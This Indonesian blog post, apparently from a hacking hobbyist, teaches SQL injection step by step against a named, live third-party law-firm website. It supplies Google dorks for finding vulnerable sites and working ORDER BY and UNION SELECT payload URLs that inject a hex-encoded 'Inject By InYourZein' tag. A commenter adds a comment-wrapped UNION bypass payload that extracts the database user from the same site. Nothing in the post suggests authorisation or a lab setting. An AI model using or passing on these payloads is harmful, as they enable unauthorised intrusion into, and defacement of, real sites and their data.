ASSALAMU'ALAIKUM.WR.WB
oke Kali ini saya akan share materi tentang Sql Chall Mohon di simak dan perhatikan yeah..
lalu kita siapkan alat perangnya di bawah ini gan:v
DORK :
Inurl:index.php?id=
inurl:view.php?cid=
inurl:/detail_berita.php?id=
inurl:/umum.php?id=
Oke langsung aja ke tutorialnya :)
Pertama tama dorking dulu ea seperti biasa
Ini saya ada live target
http://www.cgslegal.com.au/staff.php?id=38
Untuk mengetahui Web tersebut vuln atau tidak, tambahkan (') di belakang angka id
Seperti ini contohnya :
http://www.cgslegal.com.au/staff.php?id=38'
Jika Web tersebut vuln, akan muncul kata kata seperti gambar di bawah ini
Lanjut ea :v
Tambahkan +order+by+1--+- di belakangnya
http://www.cgslegal.com.au/staff.php?id=38%27+order+by+1--+-
(angka %27 abaikan saja ea :v)
Lanjutkan sampai menemukan angka yang error
http://www.cgslegal.com.au/staff.php?id=38%27+order+by+2--+- >>gak error
http://www.cgslegal.com.au/staff.php?id=38%27+order+by+3--+- >>gak error
http://www.cgslegal.com.au/staff.php?id=38%27+order+by+4--+- >>gak error
http://www.cgslegal.com.au/staff.php?id=38%27+order+by+7--+- >>error
Nahh di sini saya error di angka 7. Dapat dipastikan kolom Web tersebut ada 6
Lanjut voss ea:v
Ganti (+order+by+7--+-) dengan (+union+select+1,2,3,4,5,6--+-) *angka 1-6 tersebut adalah kolom dari Web tersebut* dan tambahkan (-) di depan angka id nya
Contohnya :
http://www.cgslegal.com.au/staff.php?id=-38%27+union+select+1,2,3,4,5,6--+-
Seperti itu voss :v
Maka kita akan menemukan angka ajaib dari Web tersebut
Di sini saya mendapatkan angka Ajaib 2 dan 3
Lalu pergi ke Web ini untuk mengganti kata-kata yang kalian buat menjadi nomor Hex.
Isi kolom bagian atas. Kata-katanya terserah kalian. Contoh saya memakai kata-kata "Inject By InYourZein". Lalu pencet "Convert" untuk mengganti kata-kata tersebut menjadi nomor Hex. Di sini nomor/angka Hex saya adalah 496e6a65637420427920496e596f75725a65696e20
Next :v
Kembali lagi ke Angka Ajaib yang sudah kalian dapatkan tadi di atas. Pilih salah satu angka Ajaib nya. Ganti angka Ajaib menjadi Nomor Hex kalian yang tadi. Tambahkan (0x) di depan Nomor Hex yang tadi. Contoh di sini saya memilih angka 2.
Hasilnya seperti ini
http://www.cgslegal.com.au/staff.php?id=-38%27+union+select+1,0x496e6a65637420427920496e596f75725a65696e20,3,4,5,6--+-
Gampang kan ;)
Sekian materi dari saya. Semoga bermanfaat 🙏 🙏
Dh gk bisa
BalasHapusGabisa
BalasHapusApakah itu udh bisa di report?
BalasHapushttp://www.cgslegal.com.au/staff.php?id=-38%27+/*!50000union*/+select+1,user(),3,4,5,6--+-
BalasHapusNih yang bilang dah gabisa